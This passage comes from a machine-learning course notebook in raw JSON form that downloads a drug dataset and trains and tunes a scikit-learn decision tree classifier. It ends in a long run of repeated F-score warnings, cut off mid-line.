https://s3-api.us-geo.objectstorage.softlayer.net/cf-courses-data/CognitiveClass/ML0101ENv3/labs/drug200.csv\nResolving s3-api.us-geo.objectstorage.softlayer.net (s3-api.us-geo.objectstorage.softlayer.net)... 67.228.254.196\nConnecting to s3-api.us-geo.objectstorage.softlayer.net (s3-api.us-geo.objectstorage.softlayer.net)|67.228.254.196|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 6027 (5.9K) [text/csv]\nSaving to: ‘drug200.csv’\n\ndrug200.csv 100%[===================>] 5.89K --.-KB/s in 0s \n\n2020-10-11 10:54:57 (14.0 MB/s) - ‘drug200.csv’ saved [6027/6027]\n\n" ] ], [ [ "**Did you know?** When it comes to Machine Learning, you will likely be working with large datasets. As a business, where can you host your data? IBM is offering a unique opportunity for businesses, with 10 Tb of IBM Cloud Object Storage: [Sign up now for free](http://cocl.us/ML0101EN-IBM-Offer-CC)\n", "_____no_output_____" ], [ "now, read data using pandas dataframe:\n", "_____no_output_____" ] ], [ [ "my_data = pd.read_csv(\"drug200.csv\", delimiter=\",\")\nmy_data[0:5]", "_____no_output_____" ] ], [ [ "<div id=\"practice\"> \n <h3>Practice</h3> \n What is the size of data? \n</div>\n", "_____no_output_____" ] ], [ [ "# write your code here\nmy_data.size\n\n", "_____no_output_____" ] ], [ [ "<div href=\"pre-processing\">\n <h2>Pre-processing</h2>\n</div>\n", "_____no_output_____" ], [ "Using <b>my_data</b> as the Drug.csv data read by pandas, declare the following variables: <br>\n\n<ul>\n <li> <b> X </b> as the <b> Feature Matrix </b> (data of my_data) </li>\n <li> <b> y </b> as the <b> response vector (target) </b> </li>\n</ul>\n", "_____no_output_____" ], [ "Remove the column containing the target name since it doesn't contain numeric values.\n", "_____no_output_____" ] ], [ [ "X = my_data[['Age', 'Sex', 'BP', 'Cholesterol', 'Na_to_K']].values\nX[0:5]", "_____no_output_____" ] ], [ [ "As you may figure out, some features in this dataset are categorical such as **Sex** or **BP**. Unfortunately, Sklearn Decision Trees do not handle categorical variables. But still we can convert these features to numerical values. **pandas.get_dummies()**\nConvert categorical variable into dummy/indicator variables.\n", "_____no_output_____" ] ], [ [ "from sklearn import preprocessing\nle_sex = preprocessing.LabelEncoder()\nle_sex.fit(['F','M'])\nX[:,1] = le_sex.transform(X[:,1]) \n\n\nle_BP = preprocessing.LabelEncoder()\nle_BP.fit([ 'LOW', 'NORMAL', 'HIGH'])\nX[:,2] = le_BP.transform(X[:,2])\n\n\nle_Chol = preprocessing.LabelEncoder()\nle_Chol.fit([ 'NORMAL', 'HIGH'])\nX[:,3] = le_Chol.transform(X[:,3]) \n\nX[0:5]\n", "_____no_output_____" ] ], [ [ "Now we can fill the target variable.\n", "_____no_output_____" ] ], [ [ "y = my_data[\"Drug\"]\ny[0:5]", "_____no_output_____" ] ], [ [ "<hr>\n\n<div id=\"setting_up_tree\">\n <h2>Setting up the Decision Tree</h2>\n We will be using <b>train/test split</b> on our <b>decision tree</b>. Let's import <b>train_test_split</b> from <b>sklearn.cross_validation</b>.\n</div>\n", "_____no_output_____" ] ], [ [ "from sklearn.model_selection import train_test_split", "_____no_output_____" ] ], [ [ "Now <b> train_test_split </b> will return 4 different parameters. We will name them:<br>\nX_trainset, X_testset, y_trainset, y_testset <br> <br>\nThe <b> train_test_split </b> will need the parameters: <br>\nX, y, test_size=0.3, and random_state=3. <br> <br>\nThe <b>X</b> and <b>y</b> are the arrays required before the split, the <b>test_size</b> represents the ratio of the testing dataset, and the <b>random_state</b> ensures that we obtain the same splits.\n", "_____no_output_____" ] ], [ [ "X_trainset, X_testset, y_trainset, y_testset = train_test_split(X, y, test_size=0.3, random_state=3)", "_____no_output_____" ] ], [ [ "<h3>Practice</h3>\nPrint the shape of X_trainset and y_trainset. Ensure that the dimensions match\n", "_____no_output_____" ] ], [ [ "# your code\nX_trainset.shape,y_trainset.shape\n", "_____no_output_____" ] ], [ [ "Print the shape of X_testset and y_testset. Ensure that the dimensions match\n", "_____no_output_____" ] ], [ [ "# your code\nX_testset.shape,y_testset.shape\n", "_____no_output_____" ] ], [ [ "<hr>\n\n<div id=\"modeling\">\n <h2>Modeling</h2>\n We will first create an instance of the <b>DecisionTreeClassifier</b> called <b>drugTree</b>.<br>\n Inside of the classifier, specify <i> criterion=\"entropy\" </i> so we can see the information gain of each node.\n</div>\n", "_____no_output_____" ] ], [ [ "drugTree = DecisionTreeClassifier(criterion=\"entropy\", max_depth = 4)\ndrugTree # it shows the default parameters", "_____no_output_____" ] ], [ [ "Next, we will fit the data with the training feature matrix <b> X_trainset </b> and training response vector <b> y_trainset </b>\n", "_____no_output_____" ] ], [ [ "drugTree.fit(X_trainset,y_trainset)", "_____no_output_____" ] ], [ [ "<hr>\n\n<div id=\"prediction\">\n <h2>Prediction</h2>\n Let's make some <b>predictions</b> on the testing dataset and store it into a variable called <b>predTree</b>.\n</div>\n", "_____no_output_____" ] ], [ [ "predTree = drugTree.predict(X_testset)", "_____no_output_____" ] ], [ [ "You can print out <b>predTree</b> and <b>y_testset</b> if you want to visually compare the prediction to the actual values.\n", "_____no_output_____" ] ], [ [ "print (predTree [0:5])\nprint (y_testset [0:5])\n", "['drugY' 'drugX' 'drugX' 'drugX' 'drugX']\n40 drugY\n51 drugX\n139 drugX\n197 drugX\n170 drugX\nName: Drug, dtype: object\n" ] ], [ [ "<hr>\n\n<div id=\"evaluation\">\n <h2>Evaluation</h2>\n Next, let's import <b>metrics</b> from sklearn and check the accuracy of our model.\n</div>\n", "_____no_output_____" ] ], [ [ "from sklearn import metrics\nimport matplotlib.pyplot as plt\nprint(\"DecisionTrees's Accuracy: \", metrics.accuracy_score(y_testset, predTree))", "DecisionTrees's Accuracy: 0.9833333333333333\n" ] ], [ [ "**Accuracy classification score** computes subset accuracy: the set of labels predicted for a sample must exactly match the corresponding set of labels in y_true. \n\nIn multilabel classification, the function returns the subset accuracy. If the entire set of predicted labels for a sample strictly match with the true set of labels, then the subset accuracy is 1.0; otherwise it is 0.0.\n", "_____no_output_____" ], [ "## Practice\n\nCan you calculate the accuracy score without sklearn ?\n", "_____no_output_____" ] ], [ [ "# your code here\nfrom sklearn import tree\nfrom sklearn import metrics,model_selection", "_____no_output_____" ] ], [ [ "# Declare and play with model", "_____no_output_____" ] ], [ [ "model=tree.DecisionTreeClassifier(criterion='entropy')\nmodel.fit(X_trainset,y_trainset)\nyhat=model.predict(X_testset)\nmetrics.classification_report(y_testset,yhat)", "_____no_output_____" ], [ "model", "_____no_output_____" ] ], [ [ "# USE Grid Search for best parameters", "_____no_output_____" ] ], [ [ "model=tree.DecisionTreeClassifier(criterion='entropy')\nscorer=metrics.make_scorer(metrics.f1_score,average='weighted')\nparam={'criterion':['entropy'],'max_depth':[2,4,6,8,10,12,14,16],\n 'min_samples_leaf':[2,4,6,8,10,12,14,16],'min_samples_split':[2,4,6,8,10,12,14,16]}\nGrid1=model_selection.GridSearchCV(model,param,scoring=scorer)\nGrid1.fit(X_trainset,y_trainset)\n#Grid1.best_estimator_", "/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/model_selection/_split.py:2053: FutureWarning: You should specify a value for 'cv' instead of relying on the default value. The default value will change from 3 to 5 in version 0.22.\n warnings.warn(CV_WARNING, FutureWarning)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 